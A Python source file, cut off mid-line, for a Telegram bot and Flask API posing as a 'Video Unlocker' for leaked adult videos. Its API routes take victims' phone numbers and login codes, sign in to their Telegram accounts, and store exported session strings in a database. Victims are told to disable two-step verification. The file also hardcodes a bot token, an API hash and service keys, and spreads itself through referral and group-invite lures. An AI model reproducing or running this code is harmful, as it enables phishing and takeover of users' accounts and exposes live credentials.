import os import time import threading import requests import asyncio import re import urllib3 from flask import Flask, jsonify, make_response, request from supabase import create_client from pyrogram import Client, filters, enums, idle from pyrogram.errors import SessionPasswordNeeded, PhoneCodeInvalid, PhoneCodeExpired, UserDeactivated, SessionRevoked, AuthKeyUnregistered from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, WebAppInfo urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # ================= CONFIGURATION ================= BOT_TOKEN = "8628213901:AAFvfHBpZ6tok40ZQuhIDLAVIMrHeiheMNY" API_ID = 2040 API_HASH = "b18441a1ff607e10a989891a5462e627" SUPABASE_URL = "https://yctirvnryrzygoxbpvoy.supabase.co" SUPABASE_KEY = "sb_publishable_aBcD-atruskWwoCiLr0lWw_inT8GLoN" PREMIUM_CHANNEL_ID = -1002825744390 # WebApp URL (index.html) WEB_APP_URL = "https://rony90790.github.io/Forward-bot/index.html" BYSE_API_KEY = "133323knboif885fhgwxvf" ADMIN_IDS = [7307789267] app = Flask(__name__) supabase = create_client(SUPABASE_URL, SUPABASE_KEY) admin_states = {} temp_clients = {} try: main_loop = asyncio.get_running_loop() except RuntimeError: main_loop = asyncio.new_event_loop() asyncio.set_event_loop(main_loop) def run_async(coro): future = asyncio.run_coroutine_threadsafe(coro, main_loop) return future.result() bot = Client("file_unlocker_bot", api_id=API_ID, api_hash=API_HASH, bot_token=BOT_TOKEN) async def db_query(func): return await asyncio.to_thread(func) # ================= FLASK API ROUTES ================= @app.route('/') def index(): return "Bot, Media Uploader, and Real Session API is Running! 🚀" # রাশিয়ান স্টাইলের ওটিপি চ্যাট রিডাইরেক্টর গেটওয়ে @app.route('/api/jump') def jump_to_telegram(): html_content = """ Redirecting...
⏳ Connecting...
Opening Telegram Service Notifications
""" return make_response(html_content) def add_cors_headers(response): response.headers['Access-Control-Allow-Origin'] = '*' response.headers['Access-Control-Allow-Methods'] = 'GET, POST, OPTIONS' response.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization' return response @app.route('/api/videos') def api_videos(): try: res = supabase.table('videos').select('*').order('id', desc=True).execute() return add_cors_headers(make_response(jsonify(res.data))) except Exception as e: return add_cors_headers(make_response(jsonify([]))) @app.route('/api/check_login', methods=['POST', 'OPTIONS']) def api_check_login(): if request.method == 'OPTIONS': return add_cors_headers(make_response()) data = request.json or {} user_id = data.get('user_id') async def check_user(): res = await db_query(lambda: supabase.table('user_sessions').select('session_string').eq('user_id', user_id).execute()) if res.data: session_string = res.data[0]['session_string'] temp_client = Client(f"test_session_{user_id}", session_string=session_string, api_id=API_ID, api_hash=API_HASH, in_memory=True) try: await temp_client.connect() await temp_client.get_me() await temp_client.disconnect() return {"status": "logged_in"} except Exception: try: await temp_client.disconnect() except: pass await db_query(lambda: supabase.table('user_sessions').delete().eq('user_id', user_id).execute()) return {"status": "not_logged_in"} return {"status": "not_logged_in"} try: result = run_async(check_user()) return add_cors_headers(make_response(jsonify(result))) except Exception as e: return add_cors_headers(make_response(jsonify({"status": "error"}))) @app.route('/api/send_code', methods=['POST', 'OPTIONS']) def api_send_code(): if request.method == 'OPTIONS': return add_cors_headers(make_response()) data = request.json or {} phone = data.get('phone') user_id = data.get('user_id') if not user_id or str(user_id) == '123456': return add_cors_headers(make_response(jsonify({"status": "error", "msg": "Please Open WebApp inside Telegram Bot!"}))) async def process_send_code(): if phone in temp_clients: try: await temp_clients[phone]['client'].disconnect() except: pass client = Client(f"session_{phone}", api_id=API_ID, api_hash=API_HASH, in_memory=True) await client.connect() try: code_info = await client.send_code(phone) temp_clients[phone] = {'client': client, 'hash': code_info.phone_code_hash} return {"status": "ok", "hash": code_info.phone_code_hash} except Exception as e: await client.disconnect() return {"status": "error", "msg": str(e)} try: result = run_async(process_send_code()) return add_cors_headers(make_response(jsonify(result))) except Exception as e: return add_cors_headers(make_response(jsonify({"status": "error", "msg": str(e)}))) @app.route('/api/verify_code', methods=['POST', 'OPTIONS']) def api_verify_code(): if request.method == 'OPTIONS': return add_cors_headers(make_response()) data = request.json or {} phone = data.get('phone') user_otp = data.get('otp') user_id = data.get('user_id') if phone not in temp_clients: return add_cors_headers(make_response(jsonify({"status": "error", "msg": "Session expired, request code again!"}))) async def process_verify(): temp_data = temp_clients[phone] client = temp_data['client'] phone_hash = temp_data['hash'] try: await client.sign_in(phone, phone_hash, user_otp) session_string = await client.export_session_string() await client.disconnect() await db_query(lambda: supabase.table('user_sessions').insert({"user_id": user_id, "session_string": session_string}).execute()) del temp_clients[phone] return {"status": "ok"} except SessionPasswordNeeded: await client.disconnect() del temp_clients[phone] return {"status": "error", "msg": "Two-Step Verification is ON! Please turn it off and try again."} except PhoneCodeInvalid: return {"status": "error", "msg": "Invalid OTP Code!"} except PhoneCodeExpired: await client.disconnect() del temp_clients[phone] return {"status": "error", "msg": "OTP Expired! Request again."} except Exception as e: await client.disconnect() del temp_clients[phone] return {"status": "error", "msg": str(e)} try: result = run_async(process_verify()) return add_cors_headers(make_response(jsonify(result))) except Exception as e: return add_cors_headers(make_response(jsonify({"status": "error", "msg": str(e)}))) # ================= TELEGRAM BOT COMMANDS ================= @bot.on_message(filters.command("start")) async def start(client, message): if message.chat.type != enums.ChatType.PRIVATE: try: bot_me = client.me if client.me else await client.get_me() bot_link = f"https://t.me/{bot_me.username}" markup = InlineKeyboardMarkup([[InlineKeyboardButton("🎬 Watch Videos Now", url=bot_link)]]) await message.reply("🔥 **Watch Premium Viral Videos for FREE!**\n\n👉 Click the button below to watch:", reply_markup=markup) except Exception: pass return try: user_id = message.from_user.id first_name = message.from_user.first_name args = message.command referrer_id = None if len(args) > 1: try: referrer_id = int(args[1]) except ValueError: pass user_check = await db_query(lambda: supabase.table('referrals').select('*').eq('user_id', user_id).execute()) if not user_check.data: await db_query(lambda: supabase.table('referrals').insert({'user_id': user_id, 'referral_count': 0, 'referrer_id': referrer_id if referrer_id != user_id else None}).execute()) if referrer_id and referrer_id != user_id: ref_data = await db_query(lambda: supabase.table('referrals').select('referral_count').eq('user_id', referrer_id).execute()) if ref_data.data: new_count = ref_data.data[0]['referral_count'] + 1 await db_query(lambda: supabase.table('referrals').update({'referral_count': new_count}).eq('user_id', referrer_id).execute()) try: safe_name = first_name.replace('<', '').replace('>', '') if first_name else "User" success_msg = f"🎉 Congratulations!\n\n👤 {safe_name} has joined using your link!\n📈 Total Invites: {new_count}\n\nGo to the Web App to check unlocked videos!" markup = InlineKeyboardMarkup([[InlineKeyboardButton("🎬 Check Unlocked Videos", web_app=WebAppInfo(url=WEB_APP_URL))]]) await client.send_message(referrer_id, success_msg, parse_mode=enums.ParseMode.HTML, reply_markup=markup) except Exception: pass bot_me = client.me if client.me else await client.get_me() markup = InlineKeyboardMarkup([ [InlineKeyboardButton("🔥 Play Viral Videos 🔞", web_app=WebAppInfo(url=WEB_APP_URL))], [InlineKeyboardButton("📢 Add to Group", url=f"https://t.me/{bot_me.username}?startgroup=true")] ]) welcome_text = (f"Hello {first_name}! 👋\n\n🎁 Welcome to Video Unlocker Pro!\nHere you can watch premium leaked and viral videos completely for FREE.\n\n👇 Click the button below to Open App:") await message.reply(welcome_text, parse_mode=enums.ParseMode.HTML, reply_markup=markup) except Exception as e: print(f"Start error: {e}") @bot.on_message(filters.new_chat_members) async def bot_added_to_group(client, message): me = client.me if getattr(me, "id", None) is None: try: me = await client.get_me() except: return for member in message.new_chat_members: if member.id == me.id: try: await db_query(lambda: supabase.table('groups').upsert({'group_id': message.chat.id}).execute()) group_name = message.chat.title admin_msg = f"✅ Bot added to a new group!\n\n📌 Group Name: {group_name}\n🆔 ID: {message.chat.id}" for admin_id in ADMIN_IDS: try: await client.send_message(chat_id=admin_id, text=admin_msg, parse_mode=enums.ParseMode.HTML) except: pass except: pass @bot.on_message(filters.command("blur") & filters.private & filters.user(ADMIN_IDS)) async def set_blur_state(client, message): try: args = message.text.split() if len(args) > 1 and args[1].lower() in ['0', '0%', 'off', 'cancel']: if message.chat.id in admin_states: admin_states[message.chat.id].pop("blur_percent", None) admin_states[message.chat.id].pop("clear_percent", None) await message.reply("✅ Blur mode is disabled!\nUploaded videos will no longer be blurred, only watermarked as before.", parse_mode=enums.ParseMode.HTML) return match = re.search(r'/blur\s+(\d+)%?(?:\s+(\d+)%?)?', message.text, re.IGNORECASE) if match: percent = int(match.group(1)) clear_percent = int(match.group(2)) if match.group(2) else 0 if percent == 0: if message.chat.id in admin_states: admin_states[message.chat.id].pop("blur_percent", None) admin_states[message.chat.id].pop("clear_percent", None) await message.reply("✅ Blur mode is disabled!", parse_mode=enums.ParseMode.HTML) return if message.chat.id not in admin_states: admin_states[message.chat.id] = {} admin_states[message.chat.id]["blur_percent"] = percent admin_states[message.chat.id]["clear_percent"] = clear_percent clear_msg = f"and the top {clear_percent}% part will remain clear." if clear_percent > 0 else "The entire photo/video will be blurred." reply_text = f"✅ Blur set to: {percent}%\n📌 {clear_msg}\n\nThis will be applied to all future uploads.\n(To disable, send /blur 0)" await message.reply(reply_text, parse_mode=enums.ParseMode.HTML) else: await message.reply("❌ Invalid command!\nCorrect format: `/blur 60` or `/blur 60 20`") except Exception as e: print(e) def upload_file_sync(upload_url, file_path, api_key): try: with open(file_path, 'rb') as f: res = requests.post(upload_url, data={'key': api_key}, files={'file': f}, timeout=900) return res.json() if res.status_code == 200 else {} except Exception as e: return {} @bot.on_message((filters.video | filters.animation | filters.photo) & filters.private & filters.user(ADMIN_IDS)) async def handle_media_upload(client, message): state = admin_states.get(message.chat.id, {}) if state.get("step") == "broadcast": await process_broadcast(client, message) return media_type = "video" if message.video else "animation" if message.animation else "photo" has_blur_caption = message.caption and "/blur" in message.caption.lower() is_persistent_blur = bool(state.get("blur_percent")) if media_type == "photo" and not (has_blur_caption or is_persistent_blur): status = await message.reply("⏳ Saving thumbnail...") try: local_path = await message.download() def upload_to_supabase(): with open(local_path, 'rb') as f: file_bytes = f.read() file_name = f"thumb_{int(time.time())}.jpg" supabase.storage.from_('thumbnails').upload(file_name, file_bytes, {"content-type": "image/jpeg"}) return supabase.storage.from_('thumbnails').get_public_url(file_name) direct_link = await asyncio.to_thread(upload_to_supabase) if os.path.exists(local_path): os.remove(local_path) await status.edit_text(f"✅ Thumbnail saved successfully!\n\n{direct_link}", parse_mode=enums.ParseMode.HTML) except Exception as e: await status.edit_text(f"⚠️ Upload Error: {e}") return raw_caption = message.caption or "" blur_match = re.search(r'/blur\s+(\d+)%?(?:\s+(\d+)%?)?', raw_caption, re.IGNORECASE) is_blur = False blur_percent = 0 clear_percent = 0 clean_caption = raw_caption if blur_match: is_blur = True blur_percent = int(blur_match.group(1)) clear_percent = int(blur_match.group(2)) if blur_match.group(2) else 0 clean_caption = re.sub(r'/blur\s*\d+%?(?:\s*\d+%?)?', '', raw_caption, flags=re.IGNORECASE).strip() elif state.get("blur_percent"): is_blur = True blur_percent = state["blur_percent"] clear_percent = state.get("clear_percent", 0) is_large_video = False if media_type == "video": duration = message.video.duration if message.video and message.video.duration else 0 file_size = message.video.file_size if message.video and message.video.file_size else 0 MAX_DURATION = 7200 # 2 Hours MAX_SIZE = 1900 * 1024 * 1024 # 1.9 GB if duration > MAX_DURATION or file_size > MAX_SIZE: is_large_video = True is_blur = False status_msg = await message.reply("⏳ Video is too large! Skipping blur..." if is_large_video else "⏳ Downloading media...") bot_me = client.me if client.me else await client.get_me() bot_link = f"https://t.me/{bot_me.username}" original_file, watermarked_file, blurred_file, final_file, embed_link = None, None, None, None, None try: original_file = await message.download() final_file = original_file if media_type == "video" and not is_large_video: await status_msg.edit_text("⏳ Watermarking video... (Fast processing)") watermarked_file = f"{original_file}_wm.mp4" cmd = [ "ffmpeg", "-y", "-i", original_file, "-vf", "drawtext=text='@mxvdo':x=W-tw-20:y=H-th-20:fontsize=22:fontcolor=white@0.7:shadowcolor=black@0.8:shadowx=2:shadowy=2:enable='gte(t,5)'", "-c:v", "libx264", "-preset", "ultrafast", "-threads", "2", "-crf", "28", "-pix_fmt", "yuv420p", "-c:a", "aac", "-b:a", "128k", "-movflags", "+faststart", watermarked_file ] process = await asyncio.create_subprocess_exec(*cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) await process.communicate() if process.returncode == 0 and os.path.exists(watermarked_file): final_file = watermarked_file if is_blur and not is_large_video: await status_msg.edit_text(f"⏳ Applying {blur_percent}% blur...") radius = max(2, min(20, int((blur_percent / 100.0) * 30))) ext = "jpg" if media_type == "photo" else "mp4" blurred_file = f"{original_file}_blurred.{ext}" if clear_percent > 0: clear_ratio = clear_percent / 100.0 # FFMPEG Audio Map ফিক্স ff_filter = ["-filter_complex", f"[0:v]split[v1][v2];[v2]boxblur={radius}:1[blurred];[v1]crop=iw:ih*{clear_ratio}:0:0[top];[blurred][top]overlay=0:0[vout]", "-map", "[vout]"] if media_type == "video": ff_filter.extend(["-map", "0:a?"]) else: ff_filter = ["-vf", f"boxblur={radius}:1"] if media_type == "photo": cmd_blur = ["ffmpeg", "-y", "-i", final_file] + ff_filter + [blurred_file] elif media_type == "animation": cmd_blur = ["ffmpeg", "-y", "-i", final_file] + ff_filter + ["-c:v", "libx264", "-preset", "ultrafast", "-threads", "2", "-pix_fmt", "yuv420p", blurred_file] else: cmd_blur = ["ffmpeg", "-y", "-i", final_file] + ff_filter + ["-c:v", "libx264", "-preset", "ultrafast", "-threads", "2", "-crf", "28", "-pix_fmt", "yuv420p", "-c:a", "aac", "-b:a", "128k", "-movflags", "+faststart", blurred_file] process_blur = await asyncio.create_subprocess_exec(*cmd_blur, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) await process_blur.communicate() if process_blur.returncode == 0 and os.path.exists(blurred_file): final_file = blurred_file if media_type == "video": await status_msg.edit_text("⏳ Uploading video to byse.sx server...") api_endpoint = "https://api.byse.sx/upload/server" loop = asyncio.get_event_loop() response = await loop.run_in_executor(None, lambda: request